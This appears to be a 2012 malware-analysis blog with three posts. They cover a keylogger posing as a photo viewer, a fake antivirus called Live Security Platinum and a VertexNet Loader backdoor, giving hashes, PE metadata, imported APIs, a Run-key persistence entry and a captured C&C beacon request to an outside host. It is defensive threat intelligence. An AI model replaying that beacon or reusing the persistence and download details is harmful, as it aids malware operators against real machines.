MalwareDisasters is a division of MalwareIntelligence. In the same test information is captured about the behavior of malicious code, and also offering the necessary countermeasures to mitigate the malicious actions in question.

7.19.2012

I give you a picture and you give me your private data! What you say?


MD5 :  bf25f7588c58cd4b7cc5ac04ebfd00c5
SHA1:  1c8e7315fae2a2af199bc3d79a5fec5cc8de4f79
['Microsoft Visual Basic v5.0 - v6.0']

PE Information
     Win32 Executable Microsoft Visual Basic 6 (86.2%)
     Win32 Executable Generic (5.8%)
     Win32 Dynamic Link Library (generic) (5.1%)
     Generic Win/DOS Executable (1.3%)
     DOS Executable Generic (1.3%)


     Optional Header: 0x400000
     Address Of Entry Point: 0x1b04
     Compile Time: 2012-01-25 10:58:42
     Number of RVA and Sizes: 16
     DLL: False
     Number of Sections: 3


[IMAGE_RESOURCE_DIRECTORY]
     0x2B000    0x0   Characteristics: 0x0       
     0x2B004    0x4   TimeDateStamp: 0x4F1FFC81 [Wed Jan 25 12:58:41 2012 UTC]
     0x2B008    0x8   MajorVersion: 0x0       
     0x2B00A    0xA   MinorVersion: 0x0       
     0x2B00C    0xC   NumberOfNamedEntries: 0x0       
     0x2B00E    0xE   NumberOfIdEntries: 0x3  


Metadata
     Translation: 0x0409 0x04b0
     InternalName: Photo_Viewer_12_south
     FileVersion: 12.00
     CompanyName: ACDSee Image Viewer
     ProductName: My_Photos
     ProductVersion: 12.00
     OriginalFilename: Photo_Viewer_12_south.exe

Registry
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
NTS ACDSee Image Viewer c:\windows\system32\wpowercfg.exe

VT detection rate 19/37

The malware has keylogging functionality. All captured information is sent via SMTP and displays an image run:


Do you know this girl? :-)


Alex

Ver más

7.13.2012

New variant of another fake antivirus program called Live Security Platinum


This is the icon used for the fakeAV


Technical information & PE file attribute
MD5 :  8ed72a01f6dd01cf353091492d7e96c6
SHA1:  a810430d6d26e97b1a8b48898d8effe4ed8a140e
['Microsoft Visual C++ v6.0'], ['Microsoft Visual C++ 5.0'], ['Microsoft Visual C++'], ['Microsoft Visual C++ v6.0'], ['Installer VISE Custom']


PE information & sections:      
      Win32 Executable MS Visual C++ (generic) (65.2%)
      Win32 Executable Generic (14.7%)
      Win32 Dynamic Link Library (generic) (13.1%)
      Generic Win/DOS Executable (3.4%)
      DOS Executable Generic (3.4%)


     Optional Header: 0x400000
     Address Of Entry Point: 0x1953
     Compile Time: 2012-07-12 09:06:36
     Number of RVA and Sizes: 16
     Number of Sections: 4


Imported DLLs and API:
[1] KERNEL32.dll     
     0x407000 Sleep
     0x407004 CloseHandle
     0x407008 GetProcAddress
     0x40700c GetModuleHandleA
     0x407010 InterlockedExchange
     0x407014 SetEvent
     0x407018 CreateFileA
     0x40701c VirtualAllocEx
     0x407020 LCMapStringA
     0x407024 GetStringTypeW
     0x407028 GetStringTypeA
     0x40702c MultiByteToWideChar
     0x407030 RaiseException
     0x407034 LoadLibraryA
     0x407038 GetOEMCP
     0x40703c GetStartupInfoA
     0x407040 GetCommandLineA
     0x407044 GetVersion
     0x407048 ExitProcess
     0x40704c HeapFree
     0x407050 TerminateProcess
     0x407054 GetCurrentProcess
     0x407058 UnhandledExceptionFilter
     0x40705c GetModuleFileNameA
     0x407060 FreeEnvironmentStringsA
     0x407064 FreeEnvironmentStringsW
     0x407068 WideCharToMultiByte
     0x40706c GetEnvironmentStrings
     0x407070 GetEnvironmentStringsW
     0x407074 SetHandleCount
     0x407078 GetStdHandle
     0x40707c GetFileType
     0x407080 HeapDestroy
     0x407084 HeapCreate
     0x407088 VirtualFree
     0x40708c RtlUnwind
     0x407090 WriteFile
     0x407094 HeapAlloc
     0x407098 VirtualAlloc
     0x40709c HeapReAlloc
     0x4070a0 GetCPInfo
     0x4070a4 GetACP
     0x4070a8 LCMapStringW
[2] USER32.dll       
     0x4070b0 LoadBitmapA
     0x4070b4 ShowWindow
     0x4070b8 LoadImageA
     0x4070bc LoadIconA
[3] WINMM.dll        
     0x4070c4 mixerGetControlDetailsA


VT information about detection rate 22/42


Live Security Platinum screenshots
Warning popups


Live Security Platinum GUI:





Live Security Platinum monetization

Live Security Platinum registration

** Information obtained through the automated process malware analysis of CrimewareAttack Service(by  MalwareIntelligence).

Alex



Ver más

7.06.2012

Generic trojan type backdoor via popular crimeware “Loader”

This is the icon used for this malware.


Technical information & PE file attribute
MD5 :  aab21e11953aee66ff16772576ceaec0
SHA1:  576910d3ae484144db32dd835594c605dac90a9d
[['Microsoft Visual C++ 8'], ['VC8 -> Microsoft Corporation']


This malware was created and is spread through crimeware "VertexNet Loader".


PE information & sections:
     57.9% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
     12.2% (.DLL) Win32 Dynamic Link Library (generic) (6581/28/2)
     12.0% (.EXE) Win32 Executable Generic (6514/8/2)
     10.3% (.EXE) Win64 Executable Generic (5563/38/1)
     3.7% (.EXE) Generic Win/DOS Executable (2002/3)


Mutex: VN_MUTEX16
Optional Header: 0x400000
Address Of Entry Point: 0xaf4a
Compile Time: 2011-06-20 11:05:05
Number of RVA and Sizes: 16
Number of Sections: 5


API Functions:

     InternetReadFile
     CreateProcess
     WinExec
     ShellExecute
     URLDownloadToFileA

VT information about detection rate 35/42 


VN_MUTEX16 is the string that is set as default "mutex" through internal constructor VertexNet Loader:

This information corresponds to the default settings when creating the bot through the internal constructor:


Information report in the C&C statistics panel about infected machine:


This information is inserted into the database (default MySQL) of the crimeware. You can see this information/C&C communication in traffic capture:

GET /x1/adduser.php?uid={52bacd1a-7586-11e0-a813-xxxxxxxxxxxx--1962905967}
&lan=XXX.XXX.XXX.XXX&cmpname=XXXXXXXXXX-59903E%20[Administrator]&country= &idle=0&ver=v1.2 HTTP/1.1
User-Agent: V32
Host: tinker.vn

You can read more information about the functions, command and extract data in infected machine for this crimeware in MalwareIntelligence post: VertexNetLoader crimeware timeline, popular functions and marketing scheme


VertexNet Loader crimeware C&C
In this case, the malicious software have you control panel in hxxp://tinker.vn/x1/


** Information obtained through the automated process malware analysis of CrimewareAttack Service (by  MalwareIntelligence).

Alex

Ver más